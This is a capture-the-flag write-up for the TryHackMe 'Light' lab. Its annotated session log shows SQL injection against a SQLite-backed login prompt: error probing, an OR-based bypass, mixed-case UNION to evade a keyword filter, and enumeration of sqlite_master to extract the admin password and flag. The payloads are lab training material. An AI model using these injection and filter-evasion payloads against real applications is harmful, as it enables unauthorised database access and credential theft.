Light – TryHackMe CTF writeup

by

Description

https://tryhackme.com/room/lightroom

Welcome to the Light database application!

I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using nc MACHINE_IP 1337
You can use the username smokey in order to get started.

Solution

There is an app running on port 1337. 
We are prompted to specify a username, and then we receive a password.

For better understanding and to make it possible to copy, I will put the rest of the solution in a code block below. I added # comments for better understanding.

Welcome to the Light database!
# first we are setting input as in CTF description - we are using username smokey
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
# trying admin
Please enter your username: admin
Username not found.
# trying with ' to trigger some error
Please enter your username: smokey'
Error: unrecognized token: "'smokey'' LIMIT 30"
# trying to comment out the rest of the query
Please enter your username: ' or username='admin';--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
# trying to avoid error:
Please enter your username: ' OR 1=1 AND 'a'='a     
Password: tF8tj2o94WE4LKC
# trying to guess letter by letter
Please enter your username: ' OR username like 'a%' and 1=1 and 'a'='a               
Password: tF8tj2o94WE4LKC
# it was not effective... but at least I guessed that there is alice in db..
# I tried to guess columns:
Please enter your username: ' OR username='alice' AND 1=1 AND 'a'='a
Password: tF8tj2o94WE4LKC
Please enter your username: ' AND length(role)>0 AND username='alice' AND 'a'='a
Error: no such column: role
Please enter your username: ' AND length(is_admin)>0 AND username='alice' AND 'a'='a
Error: no such column: is_admin
# as I guessed it is sqlite db I queried the sqlite_master table
# union was blocked so I tried with mixed cases like below
Please enter your username: ' UniOn SeLeCt name FROM sqlite_master WHERE type='table' AND 'a'='a
Password: admintable
# and checked sql
Please enter your username: ' UniOn SeLeCt sql FROM sqlite_master WHERE name='admintable' AND 'a'='a
Password: CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)
# and searched for name of the user from admintable
Please enter your username: ' UniOn SeLeCt username FROM admintable WHERE 'a'='a
Password: TryHackMeAdmin
# I checked admin user password:
Please enter your username: ' UniOn SeLeCt password FROM admintable WHERE username='TryHackMeAdmin' and 'a'='a
Password: mamZtAuMlrsEy5bp6q17
# I checked if there is other table in sqlite_master table
Please enter your username: ' UniOn SeLeCt name FROM sqlite_master WHERE type='table' AND name != 'admintable' AND 'a'='a
Password: usertable
# I checked if there are even more tables, but looks like we have only the two I've already found
Please enter your username: ' UniOn SeLeCt name FROM sqlite_master WHERE type='table' AND name != 'admintable' AND name != 'usertable' AND 'a'='a
Username not found.
# I checked if in table with admins we have another user and it was a flag :)
Please enter your username: ' UniOn SeLeCt password FROM admintable WHERE username!='TryHackMeAdmin' and 'a'='a
Password: THM{FLAG_REDACTED}